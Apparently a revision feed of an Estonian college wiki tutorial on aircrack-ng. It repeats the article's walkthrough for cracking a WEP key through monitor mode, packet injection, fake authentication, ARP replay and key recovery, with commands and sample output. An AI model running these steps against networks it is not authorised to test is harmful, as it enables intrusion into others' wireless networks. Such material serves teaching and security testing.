Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&lt;br /&gt;
====Avada airodump-ng pakettide püüdmiseks====&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga==== &lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Ava aireplay-ng ARP päringute kordusrežiimis====&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Ava aircrack-ng salasõna lahti murdmiseks====&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor(id)=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;         &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89278</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89278"/>
		<updated>2015-05-25T19:07:30Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
====Samm 1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi====&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liidese:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&lt;br /&gt;
====Samm 2: Testime „süstimise“ suutlikkust pääsupunktile====&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&lt;br /&gt;
====Samm 3: Avada airodump-ng pakettide püüdmiseks====&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga==== &lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis====&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Samm 6: Ava aircrack-ng salasõna lahti murdmiseks====&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor(id)=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;         &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89272</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89272"/>
		<updated>2015-05-25T18:55:02Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
